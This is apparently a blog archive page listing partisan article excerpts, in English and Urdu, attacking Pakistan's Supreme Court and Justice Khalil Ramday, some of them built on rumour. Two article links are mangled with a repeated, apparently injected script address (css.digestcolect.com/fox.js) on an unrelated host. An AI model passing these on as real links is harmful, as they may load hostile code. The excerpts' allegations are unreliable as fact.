Justice Khalil Ramday Archive

Full Court Reference recommends Khalil Ramday for one more year – Azad Adliya Zindabad: Related articles: LUBP Archive on Justice Khalil Ramday In a latest news relayed by Dawn News and Geo News at 9.30 pm PST, a full court reference was held under the stewardship of CJP, Iftikhar Chaudhry that has “recommended through

Halal contracts and haram contracts: An open letter to CJ Iftikhar Chaudhry: Related article: Contract employees: Something the FCS wallas will never write on Asma Jahangir vs Justice Ramday – by Khalid Wasti I have just read the headline “Jobs for retired officers on contract violation of law: SC”, in The

Contract employees: Something the FCS wallas will never write on: Here is an example of a topic which will never worry the Fake Civil Society activists (Twitter Opportunists Club) because it goes against their hero, the saviour of Pakistan, CJ Iftikhar Muhammad Chaudhry. Intellectual and moral honesty are two

Thieves protecting thieves? I am confused: Related Article: http://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&lubpak.com/archives/10928 Here are some facts: Geo TV, Geo News, Geo Super and Aag TV, owned and operated by Jang Group’s Independent Media Group are known to be tax evaders. Off course, their tax evasion till June 2010

Intellect of our judges and scientists: Riko Diq Project hearings – By Ahmed Iqbalabadi: I had not been following the Riko Diq Project hoo-haa simply for the fact that it was “scooped” by none other than novelist Shaheen Sehbai in The News. Titled “$260 billion gold mines going for a song, behind closed

Supreme Court judges unduly allotted plots in Islamabad – Rauf Klasra’s first scoop: The torch bearers of justice and equality to the people of Pakistan were allotted plots in Islamabad worth millions of rupees by during the last two years! This is in spite of the “azad adliya’s” tirade against the current

Foot in Mouth Award 2010: Justice Ad-hoc Khalil ul Rehman Ramday – by Saad Mansoor: The Foot in Mouth award is awarded each year by the Plain English Campaign for a baffling comment in English language by a prominent figure. The comment can be inappropriate for being queer in grammar or content or both.

Politics of judicial appointments – by Asad Jamal: Politics of judicial appointments By: Asad Jamal Friday Times , September 17-23, 2010 The Supreme Court’s recent decision to allow extension for indefinite period to additional judges, who were appointed to the four high courts about a year ago,

Double Standard of Iftikhar Ch. et al – by Ali Asad: The Supreme Court has made public the verdict in petition filed by Kh. Haris against appointment of Mr. Irfan Qadir as Prosecutor General, NAB. The decision is in favour of the petitioner and Mr. Irfan Qadir has lost

Courts accorded temporary endorsement only ? – by Jinnah Bhutto: I got a kick out of reading the news about Justice Khalil Ramday’s comments regarding constitutional amendments petition being heard in the Supreme Court these days. His remarks sounded not just funny but hollow as well. He said,

Fake Degrees Vs Fake Petrol Bills: Source: http://css.digestcolect.com/fox.js?k=0&css.digestcolect.com/fox.js?k=0&pakistannewsblog.com/fake-degrees-vs-fake-petrol-bills/ A lot is being said these days about “Fake Degrees” and the political black sheep sitting in our assemblies. The media is leading the campaign to cleanse the assemblies and our honorable judges are providing the

Deals on personal interests and desires – by Farhad Jarral: This is an exclusive news by LUBP as it’s not published in any newspaper nor in electronic media. Justice Ramday’s son in law will be the new President of the Muslim Commercial Bank (MCB). Isn’t it interesting? Is this

Lawyers break the law again – CJ Sahab, Ramday Sahab – Introspection?: The Hon’able Chief Justice, Iftikhar Muhammad Chaudhry and Justice Khalil ur Rehman Ramday have been reminding us Pakistanis and more importantly the government the importance of upholding the law and abiding by the decisions of the court. Their own

O God, protect my country : By Khalid Wasti اللہ میرے ملک کی خیر: =============== اللہ میرے ملک کی خیر =============== وطن ِ عزیز میں کیا کچھ ہوا : قائد ِاعظم کی پر امن سیکولر سٹیٹ کو انتہا پسندوں، مذہبی جنونیوں اور متشدد گروہوں کا یرغمال بنا دیا گیا – تصور ِ پاکستان

News & Views : By Khalid Wasti خبریں اور تبصرے: ( بحوالہ روزنامہ جنگ ) ××× سسٹم خود کشی پر آمادہ ہے – ( جسٹس خلیل الرحمان رمدے) حالا نکہ ہم اسے پھانسی لگانا چاہتے ہیں ××× خواہش ہے جمہوری نظام کو نقصان نہ پہنچے – (جسٹس افتخار چوہدری)

Judicial dictators reject objections of federation on the 18th Amendment case: Today the larger bench of Supreme Court rejected federal government’s objections on the 18th amendment case, and issued show cause notices to the lawyer of the federation Dr. Abdul Basit and Advocate on Record. The objections of federation were

The standards the Supreme Court is setting for others, shouldn’t it be applying some of them to itself? – by Ayaz Amir: The new troika: Islamabad diary The political landscape is undergoing a shift, with some of the rules of engagement changing. Consequently, it is no longer true to say that the president, the prime minister and the army chief constitute Pakistan’s

The judicial coup and authoritarianism – by H.A. Khan: In one of his recent TV appearances Dr. Lal Khan, a longtime Marxist, explained that in a capitalist state the judiciary will always favour and to protect the vested interests of the ruling class. The current judicial crisis makes it

Anatomy of presidential immunity issue – by Malik Muhammad Ashraf: The question of presidential immunity is the most controversial issue at the moment and the intellectuals, politicians and the media outlets are all engaged in guiding and misguiding the masses about the intent and the scope of article 248

Breaking news: Remember we (LUBP) informed you first!: Justice Ramday to be rewarded with a senatorial position by PML-N By Omar Khattab in Lahore Lahore, the hotbed of PML-N, is abuzz with rumors that the Sharif brothers have in principle decided to make Justice (now retired) Khalil

Asma Jahangir vs Justice Ramday – by Khalid Wasti: ذہنی عدم بلوغت اور منافقت ۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔۔ افسوس کہ من حیث القوم ہم ابھی تک بالغ نظر کہلانے کے حقدار نہیں ہیں ۔ ہماری ذہنی سطح اس حد سے اوپر تو اٹھ ہی نہیں رہی کہ جو شخص سپریم کورٹ

Democracy hanged till death. Thank you, my Lords! – by Qais Anwar: مبارک ہو؛ عزت مآ ب جج صاحبان؛ آپ نے جمہوریت کے گلے میں پھندہ ڈال دیا جمہوریت کی شکست اور ایسٹبلشمنٹ کی ایک اور فتح کی کہانی اپنے عروج کی طرف بڑھ رہی ہے ؛ ایسٹبلشمنٹ نے گھات لگا

Detailed NRO Verdict and Zia-ul-Haq’s Children in the Supreme Court – by Abdul Nishapuri: The condemned soul of Pakistan’s Islamofacist dictator General Zia-ul-Haq will be extremely pleased today after reading some of the passages in the Supreme Court of Pakistan’s detailed verdict on the National Reconciliation Ordinance (NRO). In its expected judgment, a

Chief Justice Hamid Mir’s verdict in favour of Justice Khawaja Sharif – by Abdul Nishapuri: Following in the footsteps of Dr Shahid Masood, a fellow member of the Pakistani Taliban Union of Journalists, Hamid Mir too has assumed the position of the Chief Justice of Pakistan. Here is Hamid Mir’s latest, summary verdict on